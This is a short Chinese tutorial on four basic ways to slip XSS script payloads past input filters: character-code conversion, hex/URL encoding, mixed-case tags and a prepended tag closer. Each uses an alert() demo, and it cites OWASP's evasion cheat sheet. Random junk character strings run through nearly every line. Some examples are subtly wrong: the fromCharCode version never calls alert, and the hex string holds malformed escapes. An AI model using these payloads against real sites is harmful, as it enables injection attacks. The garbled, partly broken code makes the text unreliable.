四种超级基础的绕过方法。, x# n& c9 G4 b5 Q- g
1.转换为ASCII码6 k- l2 I1 A& ~9 x6 S$ Q1 ~- G
例子:原脚本为<script>alert(‘I love F4ck’)</script >
- m% R) A; Q9 Z8 [: X通过转换,变成:& P. |( D! S* U7 e% ?+ W6 J0 Y
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
j7 W: A& e4 o' D% I; i) Z ! o" {9 C& P* i' v2 c% M
2.转换为HEX(十六进制)* z% y$ x9 ^: c. H% u
例子:原脚本为<script>alert(‘I love F4ck’)</script>' H8 a8 }% K$ L+ A$ c, H% T
通过转换,变成:
! \* s$ e* Z) e7 @) l1 F! b%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e/ x A& p7 f/ E7 C# O+ y+ y
) z- f. {. C! c; x% u
3.转换脚本的大小写# m! Z# U* q) v& L9 M# |
例子:原脚本为<script>alert(‘I love F4ck’)</script>
& [" z; K" Y& j5 |; F( y转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
$ v- ~8 {+ ]% A. z' z3 x
' z6 Y/ D* i6 j) Z4.增加闭合标记”>% I6 x# r) w3 k: G! e
例子:原脚本为<script>alert(‘I love F4ck’)</script>0 P6 E' q$ J2 X
转换为:”><script>alert(‘I love F4ck’)</script>
I s( w/ J2 @) n更详细绕过技术请参考此网页1 ^" @* i( y$ k, Q _* S
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 w6 T; @% H& x. W0 X+ x' e7 v
$ b1 W* R$ f0 k& b, Q, l' u
转换工具使用的是火狐的 hackbar mozilla addon. |